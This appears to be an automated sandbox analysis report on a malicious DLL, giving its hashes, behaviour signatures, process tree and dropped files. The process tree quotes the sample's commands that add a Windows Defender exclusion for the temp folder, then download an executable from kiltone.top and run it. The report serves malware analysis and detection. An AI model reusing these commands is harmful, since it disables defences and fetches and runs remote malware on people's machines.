Analysis
-
max time kernel
80s -
max time network
78s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-12-2024 15:31
Static task
static1
Behavioral task
behavioral1
Sample
fccd129f6a5b9d2133d14922a3614f02.dll
Resource
win7-20240903-en
General
-
Target
fccd129f6a5b9d2133d14922a3614f02.dll
-
Size
206KB
-
MD5
fccd129f6a5b9d2133d14922a3614f02
-
SHA1
e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
-
SHA256
4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
-
SHA512
c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979
-
SSDEEP
3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 15 1920 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3432 powershell.exe 1920 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 3984 eryy65ty.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 452 3984 WerFault.exe 98 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eryy65ty.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 3432 powershell.exe 3432 powershell.exe 1920 powershell.exe 1920 powershell.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 3432 powershell.exe Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 3300 taskmgr.exe Token: SeSystemProfilePrivilege 3300 taskmgr.exe Token: SeCreateGlobalPrivilege 3300 taskmgr.exe Token: 33 3300 taskmgr.exe Token: SeIncBasePriorityPrivilege 3300 taskmgr.exe -
Suspicious use of FindShellTrayWindow 42 IoCs
pid Process 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe -
Suspicious use of SendNotifyMessage 42 IoCs
pid Process 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe 3300 taskmgr.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 1032 wrote to memory of 2124 1032 rundll32.exe 82 PID 1032 wrote to memory of 2124 1032 rundll32.exe 82 PID 1032 wrote to memory of 2124 1032 rundll32.exe 82 PID 2124 wrote to memory of 4008 2124 rundll32.exe 83 PID 2124 wrote to memory of 4008 2124 rundll32.exe 83 PID 2124 wrote to memory of 4008 2124 rundll32.exe 83 PID 4008 wrote to memory of 3432 4008 cmd.exe 85 PID 4008 wrote to memory of 3432 4008 cmd.exe 85 PID 4008 wrote to memory of 3432 4008 cmd.exe 85 PID 2124 wrote to memory of 3616 2124 rundll32.exe 86 PID 2124 wrote to memory of 3616 2124 rundll32.exe 86 PID 2124 wrote to memory of 3616 2124 rundll32.exe 86 PID 3616 wrote to memory of 1920 3616 cmd.exe 88 PID 3616 wrote to memory of 1920 3616 cmd.exe 88 PID 3616 wrote to memory of 1920 3616 cmd.exe 88 PID 2124 wrote to memory of 4128 2124 rundll32.exe 96 PID 2124 wrote to memory of 4128 2124 rundll32.exe 96 PID 2124 wrote to memory of 4128 2124 rundll32.exe 96 PID 4128 wrote to memory of 3984 4128 cmd.exe 98 PID 4128 wrote to memory of 3984 4128 cmd.exe 98 PID 4128 wrote to memory of 3984 4128 cmd.exe 98
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c %temp%/eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Users\Admin\AppData\Local\Temp\eryy65ty.exeC:\Users\Admin\AppData\Local\Temp/eryy65ty.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3984 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 13245⤵
- Program crash
PID:452
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3984 -ip 39841⤵PID:3932
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3300
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
16KB
MD531bb17d138289336321fb5632dd10f4e
SHA1291fe5f33d174571608d6b746274f15f7d0724ce
SHA256da2648e9ba7a071d54b1552cbc322b9cee3ba38cae1c2d0fc8e90aea82430c69
SHA5127894f2d69284991e8364a035e1ae726a7f7c503cf841009dad5275f20bc5e27a980cb746c7660dd7f1853238987c534f08326bc14bd3ccb0bc59c5bbfdd84c15
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
881KB
MD59049faba5517305c44bd5f28398fb6b9
SHA1036c6b32f3e7d7d689c9b4d482091eebcc669bfa
SHA256d2100ffe58eb50c05d97a3da738ccd1f0be9672c057c26a10140af80595b78c3
SHA51265a33506f970675775468f80b94a3f8bb2d3672e6fb08fc9f2e5107020095ca6d4bca927c59b72488e2ef4208a64a56ced7511ea14c0445cd50ea3ff9b827f6a